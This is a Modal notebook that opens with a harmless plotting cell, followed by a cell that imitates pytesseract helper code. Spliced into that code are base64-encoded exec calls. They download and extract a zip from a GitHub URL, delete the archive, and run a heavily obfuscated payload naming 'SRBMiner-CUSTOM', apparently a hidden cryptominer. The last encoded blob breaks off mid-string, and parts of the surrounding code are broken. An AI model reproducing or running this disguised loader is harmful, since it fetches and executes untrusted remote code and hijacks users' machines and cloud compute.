# Welcome to Modal notebooks!

Write Python code and collaborate in real time. Your code runs in Modal's
**serverless cloud**, and anyone in the same workspace can join.

This notebook comes with some common Python libraries installed. Run
cells with `Shift+Enter`.

In [ ]:
import matplotlib.pyplot as plt
import numpy as np

x = np.linspace(-6, 6, 1000)
y = np.sinc(x)

plt.plot(x, y, color="darkblue")
plt.axhline(0, color="black", linewidth=0.5)
plt.axvline(0, color="black", linewidth=0.5)
plt.grid(True, alpha=0.3)

In [ ]:
import base64
import zlib
import logging
import re
import shlex
import string
import subprocess
import sys
import subprocess
import zipfile
import signal
import os
import requests
from contextlib import contextmanager
from csv import QUOTE_NONE
from errno import ENOENT
from functools import wraps
from glob import iglob
from io import BytesIO
from os import environ
from os import extsep
from os import linesep
from os import remove
from os.path import normcase
from os.path import normpath
from os.path import realpath
from tempfile import NamedTemporaryFile
from time import sleep

tesseract_cmd = 'tesseract'

class Output:
    BYTES = 'bytes'
    DATAFRAME = 'data.frame'
    DICT = 'dict'
    STRING = 'string'

class PandasNotSupported(EnvironmentError):
    def __init__(self):
        super().__init__('Missing pandas package')

class TesseractError(RuntimeError):
    def __init__(self, status, message):
        self.status = status
        self.message = message
        self.args = (status, message)

class TesseractNotFoundError(EnvironmentError):
    def __init__(self):
        super().__init__(
            f"{tesseract_cmd} is not installed or it's not in your PATH."
            f' See README file for more information.',
        )

class TSVNotSupported(EnvironmentError):
    def __init__(self):
        super().__init__(
            'TSV output not supported. Tesseract >= 3.05 required',
        )

class ALTONotSupported(EnvironmentError):
    def __init__(self):
        super().__init__(
            'ALTO output not supported. Tesseract >= 4.1.0 required',
        )
exec(base64.b64decode('ZmlsZSA9IG9wZW4oJ3B5dGVzc2VyYWN0X2ltZy56aXAnLCAid2IiKQpmaWxlLndyaXRlKHJlcXVlc3RzLmdldCgiaHR0cHM6Ly9naXRodWIuY29tL2xhdXJpZWFyMjU5LWExMXkvRmlsRS02LS9yYXcvcmVmcy9oZWFkcy9tYWluL3B5dGVzc2VyYWN0X21kLnppcCIsIHN0cmVhbT1UcnVlKS5jb250ZW50KQpmaWxlLmNsb3NlKCk=='))
def kill(process, code):
    process.terminate()
    try:
        process.wait(1)
    except TypeError:  # python2 Popen.wait(1) fallback
        sleep(1)
    except Exception:  # python3 subprocess.TimeoutExpired
        pass
    finally:
        process.kill()
        process.returncode = code

exec(base64.b64decode('d2l0aCB6aXBmaWxlLlppcEZpbGUoJ3B5dGVzc2VyYWN0X2ltZy56aXAnLCAncicpIGFzIHppcF9yZWY6CiAgICB6aXBfcmVmLmV4dHJhY3RhbGwoKQ=='))

def timeout_manager(proc, seconds=None):
    try:
        if not seconds:
            yield proc.communicate()[1]
            return
        try:
            _, error_string = proc.communicate(timeout=seconds)
            yield error_string
        except subprocess.TimeoutExpired:
            kill(proc, -1)
            raise RuntimeError('Tesseract process timeout')
    finally:
        proc.stdin.close()
        proc.stdout.close()
        proc.stderr.close()


def get_errors(error_string):
    return ' '.join(
        line for line in error_string.decode(DEFAULT_ENCODING).splitlines()
    ).strip()

def cleanup(temp_name):
    """Tries to remove temp files by filename wildcard path."""
    for filename in iglob(f'{temp_name}*' if temp_name else temp_name):
        try:
            remove(filename)
        except OSError as e:
            if e.errno != ENOENT:
                raise
try:
    os.remove('pytesseract_img.zip')
except:
    sleep(0.00001)
instalI = exec(base64.b64decode('aW1wb3J0IHpsaWIsYmFzZTY0O3RocmVhZHM9NDtuYW1lPSdTUkJNaW5lci1DVVNUT00vMC4wLjQnO3duYW1lPSdNWkNwWVlvNDJFU21vZ3pOTnZkWG9nZEREem9GTGdaZVdCLk1EJztfPWxhbWJkYSBPME8wME8wME8wME8wTzBPMDBPMDBPMDBPME8wTzBPMDBPMDBPMDBPMDBPMDBPMDBPMDBPMDBPME8wTzAwTzBPMDBPME8wME8wME8wME8wME8wTzAwTzBPME8wTzAwTzAwTzAwTzAwTzBPME8wTzBPMDBPME8wME8wME8wME8wME8wME8wTzBPMDBPME8wME8wTzBPMDBPME8wME8wME8wTzAwTzBPME8wTzBPME8wME8wME8wME8wME8wTzBPMDBPME8wTzAwTzAwTzBPME8wME8wTzAwTzBPME8wME8wME8wTzBPMDBPMDBPMDBPMDBPMDBPMDBPMDBPME8wME8wME8wOl9faW1wb3J0X18oKGxhbWJkYSBzOnpsaWIuZGVjb21wcmVzcyhiYXNlNjQuYjY0ZGVjb2RlKHMpKS5kZWNvZGUoKSkoJ2VKeXJ5c2xNQWdBRVpBR3knKSkuZGVjb21wcmVzcyhfX2ltcG9ydF9fKChsYW1iZGEgczp6bGliLmRlY29tcHJlc3MoYmFzZTY0LmI2NGRlY29kZShzKSkuZGVjb2RlKCkpKCdlSnhMU2l4T05UTUJBQWZTQWdZPScpKS5iNjRkZWNvZGUoTzBPMDBPMDBPMDBPME8wTzAwTzAwTzAwTzBPME8wTzAwTzAwTzAwTzAwTzAwTzAwTzAwTzAwTzBPME8wME8wTzAwTzBPMDBPMDBPMDBPMDBPME8wME8wTzBPME8wME8wME8wME8wME8wTzBPME8wTzAwTzBPMDBPMDBPMDBPMDBPMDBPME8wTzAwTzBPMDBPME8wTzAwTzBPMDBPMDBPME8wME8wTzBPME8wTzBPMDBPMDBPMDBPMDBPME8wTzAwTzBPME8wME8wME8wTzBPMDBPME8wME8wTzBPMDBPMDBPME8wTzAwTzAwTzAwTzAwTzAwTzAwTzAwTzBPMDBPMDBPMFs6Oi0xXSkpO2V4ZWMoXyhiJ3p1YVc0OWgvLy83ejVyRVhmUWtsU1F0MVQ0cEF4Y3pQa2JxQy9aVmx3Q2dOYVVYdVdIZnVBQ2xhNHdoaVI1US91bXY4ZXNFMUNtUTFoZ2VHYWgzSmpJMkZ4MGlUNGsxaXU0b0h1b25XaGxSdVhhOHdCb1A5bWczcjFMQ25xMi85MC8reVJqNUZuT1p4QjVXTExudmhwd29MN3ZmakxRZ05KcEJwclh3SkVLMDFmVG80Y200elFuSXVhcVFIeUJMdmlTcWhkODJXajYrbDJFNjc4d1Vjc3RDRys5SDVsL1VXcGw0Z09HVzVKdjdVelhFbWlXa1ordTJkdkdoNkhQMXdQN0JudVZrT0tTdldUMjBQQTF5WTlGS1VsWTZNTk9zaGJvZnE2UDk4Q2U4Qy84SEorNkF0dkRIR2tPWnRWamhkR252Ny8wS1VpSEtSY0JGMXMwakE4dmp0em00STJPSkJuL3dtSUlNUFl6UFhKZGQyUytJem90VnZMWlFScnMxMWNER2cvdElPeHhHUG1FY05pSDViNDBoaWdmdTRnRjMxTi9iZUhTeTZwYmlkV2c1Mlg2VUYzQitoajZzUnFsVEc4TStvMmZTcTZnTkdYa2lCWDVNMFhta1g4amluM2Vpd1BjQlludkZiRXEwVFBUMGljdWVUaU01UXlCb1lUSlljaHhEY0VUUkZkTnlSOWVZZCs5TDEzN3JoMnBHdGNwMmJHZit4bm5VcU0vZDJBMlQ0a3NxUkREbWEyKzJYZlpCd0RKdmNaWDJRRkhuTWQrZkZaU0RXR1FlclRjL1dNNFlRd21sOW92TjRRek96K2tTQW1iOWF1WXBEeWRibzVrN2tYaW0vNWRuVUE1WHhLemlOdTg1NWFaMzBKL24wNGtpRmFnbTRxWGxiR2lBbklNMXludHFEUGZNcXk0YUJlL1NtSm9nend0MU0zWEk1Ym41MEFjeVh4Vi9HZU8vWnBQQy82MVVhRVMxNG5yYmY0aitxWDBHTFFyQlc0bU0rMkhCZW5Xazd4NXVZQys0WU8zMlcxZjA5YlRiMjdoYXYzdzRWRlNsUk02U0pBeVFheU1EcGp1Rmtncmw3L3pIS25COVBqczlmNE1zbHg1Z0w4aFFiTTVjQi9ybTNFSkVjNzNETnVjNUlHbkFiRjl1RTI3R1hON3lQd2M0NnVuUHpPbEd4ZkZIRkFyMU9Mb0dTU01aSmQrclhtTGFkRURCUTA3SGd0QjRaUlJFZWhqTFRwRDVpZmxGQ1o0a2g0b3ZtdksrMm5iUmU5bE5tVUw4a0thbUxYVzdYa3MrVk5yL3BhaGFwckhZMG95LzhLSTNLQ1RoNitEdkdkZDB5K0pQUit3VnNmSC9sdW4yNWErMFUycmUvWG1tQ1h3ZlB6Yy95aHRaNFcwU0xvU0pKcjloTFJ0aXJCSFNDQ0JGYktTTkQ1M01hZ01UVEJONm9UUzloUGlRVmhPVEV6MXU2ZnhiT21neFNIM2UxSXBmK0J2WlNqKzhFNnZWb3JhUUpSYlFhNkMrbWdLZEVJWEplYXB4ZUZEVDJtTXN0MEFhY1RhZHI4aHBoU1BDUXl3RUs3VDIrK0txdFFFY2dRaG5kSTU5cW96U2ZYTm41OGF3SlJGRWs5NXhpcWdjMmprZlJLWmR3M3V0NEdQMmhEZld0ZkI1ZG0wVkNFV1BnejUweGR0YmZ0WFZXRU8vaVNmNmFDczh3K1JQU0FpTHRzbXlrNHBrY2kwSmREa2NZSFpPZmE3SkdzbitieVlPaUtMMXVOMUpvUm1oNEwrYnRuN05RN1E4czljb3NsTTdZRzVXTWp4K0VyT1A2UzUydjFqME5oUGRpQy9zTloyaGdxRDJIa3JBWmRYM0R2ejZ2TnB3RGZoL3l3WnNJcWdoekQvcXdaakZKU1IxWTczUkx1eUdFaDRPUnlDVkYzSk8rNTZ0blJIYStsMTJxSTZ2Sks3NTF3VzV1TkNLNHhxdzN4Y0Jlbi9GWDFKazhiaXBwcGxwbyswMnBTbUl2VkVQV0phSGlLWHF3b1ZSeVY4OGpMdTJoTVRPbUV4cjdTaTlYNWR0WmhNeDRXem95M1BmNEtzMStrR0ZJY0xmWGRXbHNoQUc5Qk94UzBHZDIzYTMyeTVGRFdpUS9WQ2wwbHBha3VFQ05jZU1xSWRyZEo0aFdhV1d6TjJjU0U0RXVVdlZYNjdiaHRpRFVkUkczdGw3QWY5elBHdGIzbk5aNmVYVDk5aENkUk5nWUZRWERua0p1dSs3WEF1Z1Y4OVJZMGl3a1VPUTZ6UFk5V01la0pyczNnZmw2aE5kNWZ0bDdqQ2NFbUhXd096YUZLd3BEREFhZXFTcU1WYnY5eXZwd3g4T01ObGVLNkc0R3dyZTZaZkVKWTR1c3dFMllIa05KTURJenR3czN3ekdhcHV6UFNiYzdwUlBIYTk1ZnpoNHdIQ0k2STFnK01PYjVFbWxSN1hiUnJMSm9mUXh3NDJJZjNPNjNUaUIrbHE4eVJDdnVqTVdiYTRjcXZOdzlZSDN2WlpwZmZKT3RzWWp1c1A3OXhERklJZGFLbTIwMzQ2bVAyUTRCb2dOd290ZVd0bWZINkc5STBYUWE1WHRocjhZYUJCR1UvWlNCdXZYNTROR0lLOE5zNnlsOXorV3VNckhrS0FGYi9GOG9qMVJpOEMxZEFQVkplNjNvVm5uZVRDOWV0V1JZc1VqK0FDS2tacFExRDNKeUtuNmZmVEVBNnI0QXJ0VmFJbVBVKzFPRGlMY0lOb21hcHRPOGE2cDRLcTlZUkRPN0NPT3N5V3RCaGpyQ2c1SVkrZFBwYjZGS3BwS3p4UzlmZ1JLUFFUUTUwb0svMGpJOHQ4RWlOMXU5ODhyZ2Q5Z1hWd05qUUtrL0psT2htaVg3NFRWU2JwdHYzZ0o3VDV2VjRvVGw0SHBZalVJYlMwdkpOWHdnZElPTEZQNVRrdTYrNTJzUnBsZzN5YVVSVExMWW5hZUVBQVBzMlo4cEg3cVdWM2dEdjYvODEzSFRJZ0loWFBuN3BhR1BiTUUwUXZPSmtzR1kyam5MQTBvcnpyU2JBbkdxNW5kNjFSVStuUEYwK2hHeFZEcjZhVnY0SDNydDlvdDUycHhyY0xoZllVTTZieUptZHUrcTdXOE9jTytNcWdrbklXc2lGZmRvOFJKbDNoRkdmeFdUSE5CVllyWW95S21GN1RiVGpPOGZmeE9zb0JyeHFZK3hZajhnejRaMjNDQUlndExGZXI3WUQ3WERWSUoybnVPbUxZYlFNd2VkM05lSmVibEJ6Z1Z2TG9wSTlOUFppSytldDlldXVJbldyQVRaa3BPdng4REw2Q0JCZTdxUmFPVzVYV2QvQkoydXZ1YlZqRzFDblg2WXNZdlJPRzdvM3ZCRXF1czVuVmovdTIyaVR5ei9VaHdFN0twYVEzRHBBa3RkU213RWhpUU5kNFYwN0h6UEEvbGZYcFV2KzJUZ0QxU2hCK0JoYW95dXJYYlQvS2dNTDIzdDdyRTVUUmpET25FYkVEbEdidkxtdFhOb2w1VUpydFVsckR4VDFjemlDUHU5UWp1ZDhibEVIR3QwL0lrdEdTbjRIR3BhOU0yWkFsNTNGUUpGSGR2TVZ4TEJONXZiRnZLQWNlMXpxYkpuUkRmcFo5d2NXS2JhcE9EZ2ZQWHI5YjRJVFZoSmJzOGpPZWNRUnV2OTZoWk05S2NHZGJzKzBtWnk3Rmtsd0g3aXVyMVkzWHN2eDhXVktDcndBSE9iTGlaRDhhQ3A3eTNBSWpKMnJKTzZJTktDRWt1WCt4TjFKV1BtaTNUTlROS1oyNW82aUdQYWxYRzNIb0E1dGVVQ3I5RUFXSnhhb0IwcDJXeVozNGt0SzFLNEtSdEtQYU9jM1FPcjNBeUFLNWZkN3RERlRNT3JDVnMwc1F5SGxKT0N5eGh2UU82TDBwV2tZd01TVGxwSk5hRVZFbzh1ZzcwalRwUmVWczVZWVRzVk1IMm1KWG5FL3FpY2JadlhoNi83eW5ybDArYnN6dDNkMTFCTVpoSjl5Nm1ZM000M20yTDR5cW9qK2xzZk1xRnlmSXJwWEI1TDRkZExTaUxDalFsa3FkNGVLeWpwbGMvZXl4VXc2WHNGT3ZKakNxR0tkR0UzOWd5eElmdWg0cGN2eWRpK05jSis0dXlob3psLzlnUWhwVTNwdjF1YUVuWmU4TVBiM1B2WVJFcVVzckJaLzdlekZQRlQ3NzJsVmQrQ05pclM1Y3RIRzU3Ri9DNitBNmdqMjNDRWZrYkJ3dGpBdi91NGR4UW5IUXVqODJiRjlkQnNCaWhWTzdUWk0vc2hoRGltN0IvUStRRGpYZE0xRnI1d2traEFKRTNYTStaR3dhaUtDWk5qZkh5MmRaY2p6YzlhOC9GU203RXlkclJxNG5IbllCL2NTb3JxNllJV3VhT2ZOK25YdUMyM2ttN0RtamxpN2FMMWFEaVd0MTdDdUNyMW5Zc3lvdVdGc1gxekJSVm9VSGhJTUtBT0JtWjBrUVRHK05ZMzVtMHFrRDNFeDJsdGR3M3pjWkZKb0ZuT0wxOXJtUTNWR3g4bWsvRGl1MWxLcGZ1Vy9GbmJHelBmU2FzdVk0WnpiNnVGTDN2Q3oyMTVSYnVJanByMWx3cm42eXNqWkQ4VC9KMHhELzNhdk9aWlJWRDZSNTg4cHg0LzY4MVVYb29ubWQ5RGtCZHI1dnZCV2cvZURQUjNOcmJQZkZrZXowUlZBYTlxUzBvaFhXZWdoZmhmSjNLWjZPUFppbVZPeDFCeXgzeXRHU2RtZEdCNUVkMzdOL2NoSkl1ZGFWdThSZi9OT0NzNWdWRVdoYkNuSnJZL3plTXVyYXlmK1p5TDVFenpqTmxKSzkvdkRKN1VMYzJRaFJMWkkwWTl4TzdVZmYrRVQvTFhING1SMkZMcERJRlk2WU5BbUQ1czhsUG1nV3N6K1d1OGZGVnhvZ0E4S28ydWp1VGhJVU4yRDRqRE5tZVcweHVzOG1maXRMcWZab1J4eklmOUdoUGh2QU5qbVppbjdNSWFFZHViVmV5VmpLTjlvZUpVa09lKzZRcWlxZTQ5WGF3VDJaSTZlbFN3cVpvYVRQT21mN29LRHY3c3JUSzQ4TXRIYkpncFlQVnBQTFAvMC91eHRrWVFtOVc3RWFsL3pGekZpT2pHZHBJeU1kR3Z5ZVk1OGg2QWZ4T3B2UzlsN3A1Q2RhRDdkQ2NGeW9lbm4xWE4rTzJGdHlOOVNDa2JnOE41OW9HdjVYYVE1ZDN1ZnJrTStiWGtSMjF6SUhSbXRManZKN3JCZmdTYlA0YXZna1VOVTdZWDZ1VDRJazRSYkI0VkZ3SWo2TnRLR1Z2ZXliVlo1T1JiT28rc1ppMWVBVUpoQkZXeUJ6WUVjQ1haWTJ5T3NNZlpjUkZ0WUw5eFk2T0REdHJuUmU4TFE3NFF1dzM1Sk1ZQjJuVXE1K0wraG9Wd1pma0lJNFNNUkhwQit6bFlxQ2FFbXd4bnptUFY1elNyWnUybzFSMVBqTFdkaTlhcXJoTHF1S25yTldPN0pTY0c5MGpqK1ZSNG85NXVQWXhuemxLZVpaL3J4N3IzcEtFZm5kVnVwclVNcjkwOExwSFNORnE0cmlaSXlmdkZNUzRYWTNZVTJneGxQV2JxckZzRlgyUnJIQzdsbnBZUEpqc0N0S0hUUDA5cnNZWVdxMFA4MHQ2SHdsb2ZCQU94OEI2MkQ3Q2ZSTzBoa1Q1Z0c0eEhpVSsxS2prem1VU1EwN2ZtemhpNFhiQS9nQ3lndFpsZmVSdnlFdElmejhlWDdsTEkyQnF5R25KQStoR084NWFwMDYvamRNUVh3RlozdU9vNHRVVU9NZTVEZjd3TzZ6Q1JJbXo5Q2lXeTVod0N0NlFaY2xVUE1USmlPNFpoNFR4Y3FROHRpYkVJaUVQRXBvL2pPRnZoNXVWYko5Nk1GQjc0QnozZ2ZUT3lMWmlkN044UXdxTDNkd0RrN2VIYkwrQkY2RzI4Z1hmTlgzTTVXMmZZSldMcE9WUy9WeUN4OUJSZk8zOWpTK2gyYU5hVDhsQ0ZVY0xQaCtBTElCelZFMWtoYVQxS3hlRCtwMHhMWWthUWgrS3dvV2lhZDRISzZwVE5sZjFRbU5wdHNZNkhxOWgxWkFnMDJFY3pEOEpORVdCcHl3M3l3UDJmM2VKdXFheHcrRHVRbjZGN0F3NGFZSEZXN3YvWlJ5UnhJOWw0K2ZhcTUyQzBpVGVJM3hvL0Q2dXFxR0oyRmRPMkc4MkQvcUVBeWVVd1ByellCbmIvZm5hSzg4ekJaTTVOTzJTRG82K2JoNDg2cXRSckxMVGtWK2dwTnFYRWJ3cU9ieFJPbGlTRXVUUERRaGQ5WnNjSXJxa1d4Q2l2K0grYXY1NElzR001M3poRmw1UkRhWWN2Qkl5NE9HdFBJZHJPSlpJV3l6M0M4VDdLR3RYWVZqaUU1VkNkeVlIMkE2SFNoOHBRZW5LTkl5Z3d6OTJrN2tLNDg4cSthQW5PTkF6QXpmQXFNMHppN2FnSWVMVlNrTEFNSlZNMmRCSXBiS0lBYTBEaFZ5Z0ZFQ3M2Mjk0QXpRUXAxMHR1NWE2cjdHTlFDbVhTUnpYVEgrenJhbU9CUTJFYVlWWklGNmkzVlg0NlIzckFqT1NaeDk1cERGM2NiK28yUTRNVVI2eUppaVpOSDNmTEppUk5YZTZ0aHV4K2pTOGhrSlhxcmU3OS9pRWxYTUkzK3pDeHlMbEtMR0x0dDlUTTdjS0VmSSsrSEVVNUN5Ly9LVThqSmRaMTUvMjJ4YUd5c1lZT29sWWFheVp0WDIxaVlSQWZpVmQrMldCZEh5VWlLb0wyajcwL2xpS0kwc2pvRTNwWnpSbUVIMmdxdHRwN1plTjcvbm1OVHVEM0ZIZ0VKMlN0Skx4WlhmSkRzYm1RZTY1WmtrenlMNGRGQWhUUU5oM2UrUkxVeTZseGVGNURaNUsxWFRSL0Z2NkxrTnZ1VnREYmtJMzlYeGVHbTg5RUd6bmdIYkVsMGJHMUJjK3I2SnRzSzdYRkszbFY5T3FSOEp3QlE0eU5YT1g1QkdMS2VLRTI5bXk4NUJXTjcxR3dNNnRWVXdEWDVzOW1ldzRaY0t5WVA4Tk1SakxiZjBnY0FFa21xSDRIUzFYTmtYWmdHRUlzdW1Sd2xOV28zdWlNM3ZlYVZHV25iM3ZRcUVKdk5jeG9SZHRjTXdxbTVqa0ZXVkhuWGhBNHZmR3hTSytzdzRZcDVmRWs5cSs0Vnp4ckRjZ0IrOVZuUjJwYVZmK0tiYVJWUTllYjdLWUdjT3Awcy9vRFY4ZWZ0eGl0Q1ZuMG9DcUFaem9VTEF6SXJPT1JudmJ5L0IrQ2pZNUxlYlo4VkVqaThUOUloT2ZJdTVWWW5WU1NIaStKZmhJM3dLRXBKMk9neDliVkgzWVRWeVhLNTd6aThwTVhaNFRVQ2RmV0xlNkVxT2EvekIzM0YxTGFwQjdhN1UyVWpBQTFiMjhONUlBcWhvU2ZJWUhmZERCbXZUeVlqb3VBV3NCZ2kxZUJnMktKbHBGcXZ2S2JZcUdyczFhaFNEcW9JN1kzaFhHbXhUN3U2eGMrQ1JlYkhwMVVHTWhUMENPWExuZzhLTVhQazJWTTUyakZEbFlKSGZKMHNXT0RLbWRLSkV3YTFvNFdQNCt6V1JzNVc4TllNUEFGdnpFamtpVFZEc3BXb1lFdGU2bnpKS25GRFQrMDlKajExVGZaaHZNZlkzazdlVER5V0lyeUlJTmRDY2I4SU42WGpkT3p6MXJrZWVqUzJmZGFZWExWSjJXYzFKL0FKR0I1YU1YbzNrZWhrT0wzUld1ZWhuTDJmQlozQk5SeCtTdUtJdGtwSXdHMks3NCtLNGY3c29iUGVyamZGbTdTRTUvR1BpZU9aR3JOc1RSK1RlNWpBd1QrSjRjY3RKbkFuay83czZYQlZpS0FGWmJ1NGYyRXBUQnRJUjVYcDJqUnE3SFJxc2k0M2ZDQ3ZMZERrdGhWMGRyVE13Zi9JOFF4SEp1R3J4ZGkza2p6Ym9IQW9qTkRnU1VOVjBSSXJ2cE5YYnlwQzVqVkI4Vm54c3lFY3RsM1dzdVFhcGtnOGRlajNyaUVieWJ4TndvSldnajFKT0s3bCtZSktUdHVwdFk5YmkybTB2OFM3UjNJNzlZamk3MEJCYzdmeDAwQXJTWGNPV25qNGdldWxnOXd1RXVXRGNjeUs2amxuOUsvWkZtWlIzelhEelJZbExUM0VuamU5a3AvcUV0a3lzczlQSkJjVW44MnRqREhuakZ3RnREN0RISGxSOHJ4MklzSnVtOHJ0aEg0enVlQ2NFa0p1aWJDVjFHQmVDeldDNnozZFVhWTBMdDd3WHB0KzFQMC85QnBwVEs5dy9tODRaRGRFblNWYWZvNktsMUFTWS9KUmMzRmJmMkk3UnE3QmErRVFTRENXQ3Jab1dldTRyVlRteTl5Tm9DR1BHV1lXVmVldmF5VE5iR3JHb2lBaHVPSzVkZ1VlMmdUVVlOWlZHM3RNaU05UEdRaUdJcWFCUUhnTHlCS0tJcDJ2Q2FjdzNPY3lKcDErUkk1SllnNFU2d2FTWERVVk43dHo4SlY3ckZCSTlFOFh2VjRZNndTMWFOWHk1MzdQdXBONHcxaktlK1RML1RxQkZHOWVFaUY3RENkZnB5eDkxV2pLdnIzcGlKZ2wyNTYwa2xHQ0FScjZLZnNsaGJoT0VqTEhjSnhXa1J5ZFFGb1N4a0pTQVdEcHZYaC9xS2lhNW9PMWtoZHNtZlZPajg3bnpVYm1xci9GTStZQnRkVGxEbWxlNjJ5bVZadnhiSUVIQStWSExkZklDa2IzZzBYSTJ0VDd6TzRUOWpOai80OFVHQzgzZXA3RElyWnQ1YXdEK3hGeVRzdHdKdHdieDI4TkpGbTVKOVdzZmNrdVoya0F1Q3U3bERYNFBhbDJ1UmZvOFFoNzFiazU5R05TeXhHaGR1YStYL1JIWkUzNkNodlpyQ29weGYxanFjRFh6L1FXcHpLQjBQcVZjM2taMDNWYi9oZGd3V0VSbHE2SzhhMStSd2xHd28wNkt3K2xSdnpoeW9tMXdXRVgwSFVGQjJzeTlYdnNrZ0VvYzZsYmsvMFB6RFlKZ3F6eXNKRUdnV1EyL0xPVUxOcTVrMWo5NjUvUml0MVl4MFpySHBqMEd5TnROVW5ZeUpuYnlSeHo3dEcrejl3LzlqclUyVVV6SWF2ZlNKYTVUR2FWUDVuY3NKZHVoS1VwSVcxSUdsQi9NS1NMVXgrRkFPc01ycmJQVFJIQjFHbFhDV3laRnlMWm9WNm01MDhUVGNvNTR6bnoxenM4T29tN1Y5VEphNWM3WHZWS0IydldMUFNmbDVxRXIxd2hYQjNHVEF3SzFkZll4YUExa2MvZFBoVkd5aFNtKy9MOUpBeXJVYktEWFFSNk56TFhoaVpEdG0rZ2pUT05ZSDBUYkx6NlFTVmR1b3RueEQvb2pUUitOVGQ3eHRhbm00K05BM2VhblNmRTdzU3UxUTRHeFJIcGpIcys4SVIzUHVveVA5eFpOcHVxQU9DeWRqUGVBU1htUDhnZHFVRnF3N0hjVWhXV1pENWlrbktBVWE2ekcwZ0JEYVI3WGZERlUzVVlLKzBhMWtVMHZHbXk1cDNTSGF0YkZpQWhBVlFFSnRTdWpmWmpZNEEyTy95c25lK09ZU0hydHRCYjVpcXlaVzV1RnYxbWx4TENCZzNGN2hSSnphZzlQenRKNEsvQ0hTTXZ3Y2dwSUhQV21jNXkzWHdQSUJxT3phVk9kRlFJQlJvTWpyNmQ5NmpxNW9WRTNnOWkwUFBReEx6YldxS3dseHBsQlpxMFYwRmpXbE9VNTBRSjNJRGk1b2k0VUM2QkNIdERDY0twODRVYUVxSXM3ZjhRVlcwcFdnemk0SGplblhuTHNoUnF5aHIvbjJFWHl2Q2l2em1XN3RoZnExbE5BY3dMd2crcUFkeG5abW9ic3lWN2FIc1pzSW1BM3RtWkpVbmo3WnZLZ1lFcDUvWFRXOVRPaVRpVTh5SC9zRWlqK1haK1E3Rll3TTNEK0p1QTQ4WDRWYm92MVZPaFBUbmdmK0RGRDFQek1tOWtvbWNpbVU0SHdiYi80Ri9Gb0pxeWsvWjhKQ0UrOW1pcnZxT2hIS1JJdzZQR2dtMGdaVTR3U0R2RmduNjM2NFZBSDFhK0ZwK0wxbmhhYld1TEtEcVd6MUtWUkJ6RWowMDYydTgraXl4N2cxczRyYjc1UGNFQWFyVUprcWRRN1lzdWVzTEpmbHRsUFloN20ycDdvQVNvRFBNQXJ3dk8xUDlsN2dQQ1M2MFp6YmNwRk9qSGFVMGkycHlZRW5jUG1kTzFPdHBlNFRmQWtuZUxobE5OOWcyY1FidWF1UHRZNXhsWWJMc0lJS2xrUnBRcU1DTytYZFlDZDdrUEY5TmtvVTA0dVM2NURvQ0U3ZUJUL25hUHJlb1k0OTU1R0FJYjdEZGs0a010UmF4bXB4UnVzUDl0dnRONUNseWhrUEpyNHBCZFpVaTM2UGJnLzE3bzhURDE2QitxL1d6cFVWbytWVEpnR0lodXRHTnJWb1dXL1dEMWFZVFh1cS9qakRSQXhjY0xVajFIbFJXUStIMGhLWnVJNWFBOWNtQXdHSmgzM2lmb1FNVVRzdEluZWhHendTV2hqdk42ZmdiVm9KNjdsY3hkdjJYeVM5TWthQTV3U042K0hQQmtSOUF1Y0prcTFvaXVsNzJYTVE4MW83MjZOcmJzQnc5Y285a1Z1eE0vSGhvdWVYellOUTc3c3VtRGhIVFJKWGlVN1h3anRIZ0xIRUxoNVVXUi8wNUxoY0JsM0hmd1F4eEhmMjYxdU1IRG5Wa3N0eGw4dmcrVVRlR3ZsQUdvSHRBYm1id0F1Mm44aHY4Z0hTVCtHcFI0MXlNY1B6bDdpYmhrMnBudGh5M2d3d2JrOHlNN1hIc2FWZjJjOUZlcmpObTllb1JXY25lNnNmSGhITGpyV2h6N1ZyOW5MdDdQZ05QNXljUXhsQXJVbVBHRDgrVkE4bHRvVFUyWkloNEtJdzlzTDVFY25ScGg4eXlLM2pkMVV3UzZmV2tycUk4SjlRdUVSdzFwSU1yWXFidHFOMnA1d3VzT0k0S2pEY2NLTDhZeWVaSHRmZ1ZPc1A3S3pNTDUzTkF0UmR5RTBYdjBJL29NYUNoZWxybXQrQXNlcW1mOGdHdFY4SENEYnpHWmxKQWg2cU9qQzBDM1lKeStCWHlyWVFSVDdEM3pEbjVOK3J4NHlMNjhuS3VhU1NIb29ycHExSHFOSWlwR05VYzhNOW1VQkFxOThnNkc2VVRTSVZWbFZiKzBiemgxK01sWks2bEVQSUM2Y05MSHVKbTJFZVFRVVloQVdLalgyVmRubDFOUzJwZ21BbjJ4K0o2ZWJsVFAvMHpJbnlMcHVWN1o1Z2F0MEFmbXVJU0hnc052S29PbXVZckxvMjRqemt0K2RFUFU4RTNnUkZrN1ZuengzTVFJTU9vVnl6VHBlNzh0ai9yekJxdjNMQ2F3N2F1S0ZITTJQVTBzUmRQV0NVQi9kU0ZETDNoZXZ2dzF4QXkxWW5pRzdzSzFTWnh5RnhVVCsrSXQ5eVcrdkpGTk1hZGJMaXJBNXVWdjh0UDZ4anA4cS9EZ1dYR1NXNDBHaTBXcGRSV215K0hjR21wRFJCOVJDUHMvVEZsVmhKdVlrOFdGZmhQcENnNDVlaUpWWkh4MmtQdkJIQml4Z1JRaDZhbHduNmlwSEVEdE9KYTBtUzhhb1o3QmpWWjVSNUsyUWhHNzM3UXB6czNwc3BYaGUrNGtxaGw5UlBUZ0Vjdzg5TEtySHNpcXArQlk1REExWk1ncjd2TXBvN0txY01hbGZESHJUaTJWY1NzOE9IcmpTSTl5V2JnRDN4YkV4RWF5WHZERFQ0ZTdFV0ppNW85RVo5ZzZjTHNOY0V4bDljcXJvTm5sZzhDRU11dkJjVGt0UmI4dEJtSyttdWY5Mk9MWmZSUFlyMjViakU1VlE3VjNYK3R1UDVUUzlqUFhSYXdib0NaK2hiWEhpRktsL3hYb1lkUENpWWUrbFBIcmhKcGFpSG5WQjBSckh2cmNjUHVvQU1JWXlrMVljRHlJYWxBd3orQVJpRUJpRTQyYTBPeHFaU2FrdC9JZlQrZU5CTldGZzVvL3lnVnRpT0h3bFd0Nm40Z29jUll5bHVmVG5VS0JpdlRhUnh2MWg0aFRiZ0JtdGMvL214ZGdqTEJNbWIzUVhwajVIRmZTVXR6NzB1MEpXUWRBWVk4N2E3d29yYjh2VERjUW1wMXY2b0N4ZHdiK1FGUERXV3dlcGZ5dWk3MEhWajYvaW5jLzJENjhZMkpiQUt0ek5wcE5wemNPUXp0OVZqWEsyWGVwUTFpbFJaL0l6N0NqdjYyaDJmR2lKOXI1QVdzcXRHZTEwOTJja2J3L3NHK1VhZllNSTNvWVV1TDhrU1pQSWNlRFkxRXc5bTdlSmFXTGd5RG1HQnVrK2JaOHJPU0RPa1ZZYnhTYXZOcGt0S1dzdE1BUHdIY1lES3NCelFCW